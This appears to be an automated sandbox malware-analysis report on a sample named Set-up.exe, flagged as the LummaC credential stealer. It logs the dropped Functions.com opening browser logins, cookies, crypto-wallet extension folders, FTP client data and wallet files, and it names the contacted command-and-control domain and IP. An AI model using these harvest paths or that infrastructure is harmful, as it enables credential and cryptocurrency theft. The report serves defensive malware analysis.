      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\8429\Functions.comDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation      		1
      DLL Side-Loading      		12
      Process Injection      		11
      Masquerading      		2
      OS Credential Dumping      		21
      Security Software Discovery      		Remote Services11
      Input Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		11
      Input Capture      		21
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Archive Collected Data      		2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection      		Security Account Manager3
      Process Discovery      		SMB/Windows Admin Shares31
      Data from Local System      		13
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS13
      File and Directory Discovery      		Distributed Component Object Model1
      Clipboard Data      		Protocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets25
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Set-up.exe6%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\8429\Functions.com0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://locketsashayz.click/api0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      locketsashayz.click
      		172.67.158.190
      		truetrue
        		unknown
        AmbFabOJkVOtJKbeUCnvdoZI.AmbFabOJkVOtJKbeUCnvdoZI
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://locketsashayz.click/apitrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/XFunctions.com, 0000000B.00000000.1738896115.0000000000185000.00000002.00000001.01000000.00000007.sdmp, Functions.com.1.dr, Contributor.8.drfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorSet-up.exefalse
              		high
              https://www.autoitscript.com/autoit3/Functions.com.1.dr, Became.8.drfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                172.67.158.190
                		locketsashayz.clickUnited States
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1580747
                Start date and time:2024-12-25 22:43:13 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Set-up.exe
                Detection:MAL
                Classification:mal96.troj.spyw.evad.winEXE@24/21@2/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 24
                • Number of non-executed functions: 41
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                16:44:07API Interceptor1x Sleep call for process: Set-up.exe modified
                16:44:11API Interceptor18x Sleep call for process: Functions.com modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSSET_UP.exeGet hashmaliciousLummaCBrowse
                • 104.21.89.250
                F3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • 172.67.220.198
                00000.ps1Get hashmaliciousLummaCBrowse
                • 104.21.38.253
                https://fsharetv.co/Get hashmaliciousUnknownBrowse
                • 172.67.131.140
                123.ps1Get hashmaliciousLummaCBrowse
                • 104.21.90.105
                https://t.co/aoHJd5qL2sGet hashmaliciousUnknownBrowse
                • 172.67.174.18
                https://yungbucksbbq.com/portbiz/Get hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                https://email.equifaxbreachsettlement.com/c/eJwUys9qtDAQAPCnSY6STLL_DjnIp4GFr-3iLrX0EuLMiMLqWo1r-_al9x-5yDrGo2SnD8YednvYK9m5lhEPSJpaYtPgDk-NUUQKCS3r2MjegQKrAbSy1oLKWmC1UycbkU9asxZW8dfat_G7mTlit3BKdx54TBk-Bnl3XUrTIkwuwAvw27Zlw8808xR7Qh4Tz39OgJ-ZmAdhPOODWJiihuP7y__al5_1Vc5uoPhMfRyFVeuCGdMqkyv9R7hUb6HKb3m4VOUlPxfhX14VoThfb-Favhby6eA3AAD__0qSUF8Get hashmaliciousUnknownBrowse
                • 1.1.1.1
                http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                • 104.16.123.96

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1SET_UP.exeGet hashmaliciousLummaCBrowse
